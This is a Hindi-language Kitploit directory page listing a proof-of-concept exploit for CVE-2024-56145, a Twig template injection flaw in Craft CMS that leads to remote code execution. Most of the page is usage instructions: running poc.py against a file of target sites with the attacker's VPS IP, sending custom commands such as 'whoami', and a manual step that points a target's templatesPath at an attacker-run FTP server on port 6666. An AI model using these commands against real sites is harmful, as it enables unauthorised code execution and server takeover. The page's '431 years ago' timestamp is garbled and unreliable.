Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI से RCE - twig टेम्पलेट्स | Kitploit
उपकरण/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI से RCE - twig टेम्पलेट्स

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
431 साल पहलेअभी तक समीक्षित नहीं
साझा करें

स्क्रिप्ट दोबारा चलाने से पहले करें

fuser -k 6666/tcp

उपयोग -

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

कस्टम कमांड का उपयोग इस प्रकार किया जा सकता है python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i आपका आईपी या आपका VPS आईपी है (ipconfig / ifconfig चलाकर उसका उपयोग करें।

जैसे - python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

मैन्युअल एक्सप्लॉइट, उपरोक्त poc.py को अपने लक्ष्यों के विरुद्ध चलाएं, आपको कमजोर लक्ष्यों वाली आउटपुट फ़ाइल दिखाई देगी

अब क्या? आपके पास कमजोर लक्ष्य हैं लेकिन और अधिक खेलना चाहते हैं? तो मैंने poc2.py जोड़ा है जो लक्ष्य के विरुद्ध मैन्युअल परीक्षण के लिए है, यह कैसे करें? करें

fuser -k 6666/tcp
root@kitploit:~
1. Run poc2.py (port 6666 started as FTP).
2. Open the browser yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. you will see -

image

द्वारा लिखित Chirag Artani (https://x.com/Chirag99Artani)

टूल डाउनलोड करें